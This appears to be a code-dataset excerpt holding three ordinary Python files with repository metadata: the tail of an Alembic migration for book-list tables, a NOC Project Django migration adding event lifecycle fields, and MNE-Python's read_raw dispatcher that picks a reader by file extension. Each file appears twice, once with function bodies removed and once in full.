sa.PrimaryKeyConstraint('id_')
)
op.create_index(op.f('ix_book_lists_user_id'), 'book_lists', ['user_id'], unique=False)
op.create_table('subscribes',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('book_id', sa.Integer(), nullable=False),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['book_id'], ['books.book_id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id_'], ),
sa.PrimaryKeyConstraint('user_id', 'book_id')
)
op.create_table('booklist_r',
sa.Column('list_id', sa.Integer(), nullable=True),
sa.Column('book_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['book_id'], ['books.book_id'], ),
sa.ForeignKeyConstraint(['list_id'], ['book_lists.id_'], )
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('booklist_r')
op.drop_table('subscribes')
op.drop_index(op.f('ix_book_lists_user_id'), table_name='book_lists')
op.drop_table('book_lists')
op.drop_index(op.f('ix_books_book_key'), table_name='books')
op.drop_table('books')
# ### end Alembic commands ###
| 2,490 | 0 | 46 |
86d571401a990e4296d11560e57a796c4b8e779e | 1,155 | py | Python | fm/migrations/0013_event_lifecycle.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 84 | 2017-10-22T11:01:39.000Z | 2022-02-27T03:43:48.000Z | fm/migrations/0013_event_lifecycle.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 22 | 2017-12-11T07:21:56.000Z | 2021-09-23T02:53:50.000Z | fm/migrations/0013_event_lifecycle.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 23 | 2017-12-06T06:59:52.000Z | 2022-02-24T00:02:25.000Z | # ----------------------------------------------------------------------
# event lifecycle
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from django.db import models
# NOC modules
from noc.core.migration.base import BaseMigration
| 33.970588 | 97 | 0.502165 | # ----------------------------------------------------------------------
# event lifecycle
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from django.db import models
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
def migrate(self):
Event = self.db.mock_model(model_name="Event", db_table="fm_event")
self.db.add_column(
"fm_event", "status", models.CharField("Status", max_length=1, default="U")
)
self.db.add_column(
"fm_event", "active_till", models.DateTimeField("Active Till", blank=True, null=True)
)
self.db.add_column(
"fm_event",
"close_timestamp",
models.DateTimeField("Close Timestamp", blank=True, null=True),
)
self.db.add_column(
"fm_event",
"root",
models.ForeignKey(Event, blank=True, null=True, on_delete=models.CASCADE),
)
| 673 | 10 | 49 |
d4ef31c2b7a244a3e4dd3ed00d3eae530c14c6e6 | 3,203 | py | Python | mne/io/_read_raw.py | tczhangzhi/mne-python | 9fc8623eebd62d31039e90927744e376f5ee611c | [
"BSD-3-Clause"
] | null | null | null | mne/io/_read_raw.py | tczhangzhi/mne-python | 9fc8623eebd62d31039e90927744e376f5ee611c | [
"BSD-3-Clause"
] | null | null | null | mne/io/_read_raw.py | tczhangzhi/mne-python | 9fc8623eebd62d31039e90927744e376f5ee611c | [
"BSD-3-Clause"
] | null | null | null | """Generic wrapper function read_raw for specific read_raw_xxx readers."""
# Authors: Clemens Brunner <clemens.brunner@gmail.com>
#
# License: BSD (3-clause)
from pathlib import Path
from functools import partial
from . import (read_raw_edf, read_raw_bdf, read_raw_gdf, read_raw_brainvision,
read_raw_fif, read_raw_eeglab, read_raw_cnt, read_raw_egi,
read_raw_eximia, read_raw_nirx, read_raw_fieldtrip,
read_raw_artemis123, read_raw_nicolet, read_raw_kit,
read_raw_ctf, read_raw_boxy)
from ..utils import fill_doc
# supported read file formats
supported = {".edf": read_raw_edf,
".bdf": read_raw_bdf,
".gdf": read_raw_gdf,
".vhdr": read_raw_brainvision,
".fif": read_raw_fif,
".fif.gz": read_raw_fif,
".set": read_raw_eeglab,
".cnt": read_raw_cnt,
".mff": read_raw_egi,
".nxe": read_raw_eximia,
".hdr": read_raw_nirx,
".mat": read_raw_fieldtrip,
".bin": read_raw_artemis123,
".data": read_raw_nicolet,
".sqd": read_raw_kit,
".ds": read_raw_ctf,
".txt": read_raw_boxy}
# known but unsupported file formats
suggested = {".vmrk": partial(_read_unsupported, suggest=".vhdr"),
".eeg": partial(_read_unsupported, suggest=".vhdr")}
# all known file formats
readers = {**supported, **suggested}
@fill_doc
def read_raw(fname, *, preload=False, verbose=None, **kwargs):
"""Read raw file.
This function is a convenient wrapper for readers defined in `mne.io`. The
correct reader is automatically selected based on the detected file format.
All function arguments are passed to the respective reader.
The following readers are currently supported:
`~mne.io.read_raw_artemis123`, `~mne.io.read_raw_bdf`,
`~mne.io.read_raw_boxy`, `~mne.io.read_raw_brainvision`,
`~mne.io.read_raw_cnt`, `~mne.io.read_raw_ctf`, `~mne.io.read_raw_edf`,
`~mne.io.read_raw_eeglab`, `~mne.io.read_raw_egi`,
`~mne.io.read_raw_eximia`, `~mne.io.read_raw_fieldtrip`,
`~mne.io.read_raw_fif`, `~mne.io.read_raw_gdf`, `~mne.io.read_raw_kit`,
`~mne.io.read_raw_nicolet`, and `~mne.io.read_raw_nirx`.
Parameters
----------
fname : path-like
Name of the file to read.
%(preload)s
%(verbose)s
**kwargs
Additional keyword arguments to pass to the underlying reader. For
details, see the arguments of the reader for the respective file
format.
Returns
-------
raw : mne.io.Raw
Raw object.
"""
ext = "".join(Path(fname).suffixes)
if ext in readers:
return readers[ext](fname, preload=preload, verbose=verbose, **kwargs)
else:
_read_unsupported(fname)
| 33.715789 | 79 | 0.638776 | """Generic wrapper function read_raw for specific read_raw_xxx readers."""
# Authors: Clemens Brunner <clemens.brunner@gmail.com>
#
# License: BSD (3-clause)
from pathlib import Path
from functools import partial
from . import (read_raw_edf, read_raw_bdf, read_raw_gdf, read_raw_brainvision,
read_raw_fif, read_raw_eeglab, read_raw_cnt, read_raw_egi,
read_raw_eximia, read_raw_nirx, read_raw_fieldtrip,
read_raw_artemis123, read_raw_nicolet, read_raw_kit,
read_raw_ctf, read_raw_boxy)
from ..utils import fill_doc
def _read_unsupported(fname, **kwargs):
ext = "".join(Path(fname).suffixes)
msg = f"Unsupported file type ({ext})."
suggest = kwargs.get("suggest")
if suggest is not None:
msg += f" Try reading a {suggest} file instead."
msg += " Consider using a dedicated reader function for more options."
raise ValueError(msg)
# supported read file formats
supported = {".edf": read_raw_edf,
".bdf": read_raw_bdf,
".gdf": read_raw_gdf,
".vhdr": read_raw_brainvision,
".fif": read_raw_fif,
".fif.gz": read_raw_fif,
".set": read_raw_eeglab,
".cnt": read_raw_cnt,
".mff": read_raw_egi,
".nxe": read_raw_eximia,
".hdr": read_raw_nirx,
".mat": read_raw_fieldtrip,
".bin": read_raw_artemis123,
".data": read_raw_nicolet,
".sqd": read_raw_kit,
".ds": read_raw_ctf,
".txt": read_raw_boxy}
# known but unsupported file formats
suggested = {".vmrk": partial(_read_unsupported, suggest=".vhdr"),
".eeg": partial(_read_unsupported, suggest=".vhdr")}
# all known file formats
readers = {**supported, **suggested}
@fill_doc
def read_raw(fname, *, preload=False, verbose=None, **kwargs):
"""Read raw file.
This function is a convenient wrapper for readers defined in `mne.io`. The
correct reader is automatically selected based on the detected file format.
All function arguments are passed to the respective reader.
The following readers are currently supported:
`~mne.io.read_raw_artemis123`, `~mne.io.read_raw_bdf`,
`~mne.io.read_raw_boxy`, `~mne.io.read_raw_brainvision`,
`~mne.io.read_raw_cnt`, `~mne.io.read_raw_ctf`, `~mne.io.read_raw_edf`,
`~mne.io.read_raw_eeglab`, `~mne.io.read_raw_egi`,
`~mne.io.read_raw_eximia`, `~mne.io.read_raw_fieldtrip`,
`~mne.io.read_raw_fif`, `~mne.io.read_raw_gdf`, `~mne.io.read_raw_kit`,
`~mne.io.read_raw_nicolet`, and `~mne.io.read_raw_nirx`.
Parameters
----------
fname : path-like
Name of the file to read.
%(preload)s
%(verbose)s
**kwargs
Additional keyword arguments to pass to the underlying reader. For
details, see the arguments of the reader for the respective file
format.
Returns
-------
raw : mne.io.Raw
Raw object.
"""
ext = "".join(Path(fname).suffixes)
if ext in readers:
return readers[ext](fname, preload=preload, verbose=verbose, **kwargs)
else:
_read_unsupported(fname)
| 324 | 0 | 23 |